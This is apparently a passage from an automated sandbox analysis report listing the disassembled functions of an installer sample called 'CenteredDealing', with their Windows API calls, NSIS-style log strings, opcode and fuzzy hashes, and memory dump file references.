                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID: $@rD
                                                                                                                                                                                                                                                                • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
